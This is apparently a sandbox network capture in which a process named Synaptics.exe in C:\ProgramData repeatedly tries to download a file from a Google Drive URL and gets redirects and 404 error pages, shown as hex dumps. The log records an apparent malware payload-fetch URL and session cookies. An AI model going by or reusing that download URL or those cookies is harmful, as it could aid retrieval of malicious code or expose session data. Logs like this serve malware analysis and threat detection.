                                                                                                              2024-12-30 10:25:35 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:25:35 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5f 6f 6c 31 45 75 38 47 46 71 51 4f 59 51 79 38 46 59 71 4b 75 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="_ol1Eu8GFqQOYQy8FYqKuw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:25:35 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              46192.168.2.849792216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:35 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                                                                                                              2024-12-30 10:25:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:35 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-X2S7jn88OiK6csqlGxHSEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              47192.168.2.849791216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:35 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                                                                                                              2024-12-30 10:25:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:35 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-DDzIi7B6y6qEr3X2Y7wFnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              48192.168.2.849793172.217.16.1934436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:35 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                                                                                                              2024-12-30 10:25:36 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC5R5opFDXBZDj_xFI2C1hgJm0xYjxTSUWTmPX91YVIMI1SvGlqsOUIwkNRlKSaTfwpl
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:36 GMT
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce--PuK1O-OFBCAmzE0SAdyoA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:25:36 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:25:36 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 36 68 70 36 73 71 4f 52 38 43 30 49 66 5a 50 59 51 31 4f 74 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="V6hp6sqOR8C0IfZPYQ1Otw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:25:36 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              49192.168.2.849795172.217.16.1934436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:36 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                                                                                                              2024-12-30 10:25:36 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC7PVJPSoGwzHOoCGcY_qjYdov7cUW-0QHlkTqveU_wXLwtGVlxU4d2mFDjEIuqTQQZf55_Qok8
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:36 GMT
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-HMJpQcPy-1QNgBiJs3SXMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:25:36 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:25:36 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 66 64 44 6b 70 30 68 4d 51 6e 46 67 64 6b 76 75 50 50 38 76 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="MfdDkp0hMQnFgdkvuPP8vw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:25:36 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              50192.168.2.849798172.217.16.1934436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:44 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                                                                                                              2024-12-30 10:25:45 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC6DCeZRSCZBnMYPE1edPq1X3m8kNQxG7eWlBGQZXQGfT4Q49PKyoWG_CNL4JZ4DP6KZ4ojl5H0
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:45 GMT
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-n6jQ911SFKGqysCdV7hlaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:25:45 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:25:45 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 41 4d 53 61 49 51 31 77 79 38 6f 63 47 4f 65 5f 50 59 46 52 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="OAMSaIQ1wy8ocGOe_PYFRA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:25:45 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              51192.168.2.849801172.217.16.1934436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:44 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                                                                                                              2024-12-30 10:25:45 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC5eDVm4gnhoXToAsRrwGR411mWAbquMNanYAnd2chTOwahN8CDwiDciH9BDNwduHXexKWVDz8g
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:45 GMT
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-YZAeA_VocUk2GA_Rk_TmsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:25:45 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
